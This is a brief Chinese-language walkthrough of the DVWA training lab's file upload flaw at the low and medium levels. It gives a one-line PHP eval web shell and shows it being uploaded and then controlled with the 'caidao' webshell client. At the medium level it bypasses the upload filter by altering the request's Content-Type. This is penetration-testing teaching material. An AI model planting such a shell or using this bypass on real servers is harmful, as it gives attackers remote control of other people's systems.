一、環境:dvwa
二、選擇Upload,low級别
1、上傳1.php檔案和1.jpg檔案都沒問題
PHP檔案内容為:
<?php @eval($_POST["abc"]);?>
2、通路我們上傳的檔案
http://192.168.152.188/dvwa/hackable/uploads/1.jpg
可以看到圖檔
http://192.168.152.188/dvwa/hackable/uploads/1.php
什麼都看不到
3、用菜刀連結1.php檔案,點選添加
4、輕按兩下連結進入
三、選擇Upload,medium級别
1、上傳2.php檔案和2.jpg檔案,發現不能上傳2.php
2、點選view source
3、這裡限制了上傳類型,抓包修改上傳類型
4、我們将text/plain修改為image/jpeg,成功上傳
5、用菜刀連結一下
四、選擇Upload,high級别
參考小課堂 – 檔案包含漏洞
禁止非法,後果自負
歡迎關注公衆号:web安全工具庫